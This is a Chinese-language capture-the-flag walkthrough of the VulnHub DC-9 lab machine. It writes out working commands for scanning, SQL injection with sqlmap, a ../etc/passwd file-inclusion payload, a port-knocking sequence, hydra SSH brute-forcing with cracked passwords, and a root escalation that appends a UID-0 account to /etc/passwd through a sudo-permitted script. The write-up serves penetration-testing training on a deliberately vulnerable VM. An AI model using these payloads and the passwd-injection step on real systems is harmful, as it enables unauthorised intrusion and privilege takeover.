vulnhub系列:DC-9

vulnhub系列:DC-9

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

复制代码
nmap 192.168.23.0/24

nmap扫描IP 端口等信息

复制代码
nmap 192.168.23.144 -p- -sV -Pn -O

访问80端口

dirsearch目录扫描

复制代码
python3 dirsearch.py -u http://192.168.23.144/

页面查看,发现搜索框

发现登录框

sqlmap 工具跑一下,搜索框存在sql注入

库名

users下表名

UserDetails下字段

爆数据

登录框尝试,发现无法登录

爆一下另一个数据库Staff

表名

字段

数据

得到admin账号、密码,将密码进行md5解密

复制代码
transorbital1

登录admin账户

发现多了一个add record功能

之后没什么发现,拼接一下目录扫描的文件,也没什么发现

看到页面中显示文件不存在,可能存在文件包含,尝试在当前url路径拼接

复制代码
?file=../../../../..//etc/passwd

一些报告提到hnockd服务

复制代码
敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来"敲门",使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来"关门",将端口关闭,不对外监听,进一步提升了服务和系统的安全性

默认配置文件

复制代码
/etc/knockd.conf

通过文件包含查看其内容

根据文档,依次进行"敲门"

复制代码
nmap 192.168.23.144 -p 7469
nmap 192.168.23.144 -p 8475
nmap 192.168.23.144 -p 9842

再次扫描端口发现ssh服务已开启

二、getshell

将之前sql注入时得到的账号写入user.txt文件,密码写入pass.txt文件,使用hydra工具进行爆破

复制代码
hydra -L user.txt -P pass.txt 192.168.23.144 ssh

得到以下结果

复制代码
chandlerb		UrAG0D!
joeyt			Passw0rd
janitor			Ilovepeepee

依次进行ssh连接

账号1

复制代码
ssh chandlerb@192.168.23.144
UrAG0D!

没东西

账号2

复制代码
ssh joeyt@192.168.23.144
Passw0rd

也没东西

账号3

复制代码
ssh janitor@192.168.23.144
Ilovepeepee

发现多了一个目录

进入目录查看,发现存在几个密码

将其写入到 pass.txt 中,再次爆破,得到一个新的账号密码

复制代码
hydra -L user.txt -P pass.txt 192.168.23.144 ssh

fredf:B4-Tru3-001

三、提权

ssh 连接 fredf 用户,连接成功

复制代码
ssh fredf@192.168.23.144

查看当前目录没什么发现,查看当前权限

复制代码
sudo -l

看到 /opt/devstuff/dist/test/test 能以 root 权限执行,进入目录,test 文件查看是乱码,在 /opt/devstuff 下发现 test.py

查看文件内容

是一个脚本文件,生成一个用户,用root权限执行,将用户写入到 /etc/passwd 中

kali 执行命令

复制代码
openssl passwd -1 -salt dc9 123456

回到 /opt/devstuff/dist/test/ 目录,将账号密码写入 /tmp/dc9,再执行 test,将其写入到 /etc/passwd

复制代码
echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0::/root:/bin/bash' >> /tmp/dc9

sudo ./test /tmp/dc9 /etc/passwd

切换用户到 dc9,提权成功

复制代码
su dc9
123456

在 root 目录下,发现 theflag.txt,结束

相关推荐
啥都不懂的小小白2 小时前
密码学入门:从古典加密到现代网络安全
安全·web安全·密码学
电子科技圈10 小时前
芯科科技第三代无线SoC现已全面供货
嵌入式硬件·mcu·物联网·网络安全·智能家居·智能硬件·iot
Bruce_Liuxiaowei15 小时前
内网连通性判断:多协议检测方法与应用
运维·安全·网络安全
YoungLime18 小时前
DVWA靶场之十六:未验证的重定向漏洞(Open HTTP Redirect)
网络·安全·web安全
emma羊羊1 天前
【文件读写】图片木马
linux·运维·服务器·网络安全·靶场
YoungLime1 天前
DVWA靶场之十:DOM 型 XSS(DOM Based Cross Site Scripting (XSS))
网络·安全·web安全
介一安全1 天前
资产信息收集与指纹识别:HTTPX联动工具实战指南
网络安全·安全性测试·httpx·安全工具
mooyuan天天2 天前
CTFHub 信息泄露通关笔记10:SVN泄露(2种方法)
web安全·信息泄露·ctfhub·svn泄露·源码泄露·dvcs ripper
unable code2 天前
攻防世界-Web-easyupload
网络安全·web·ctf
Bruce_Liuxiaowei2 天前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全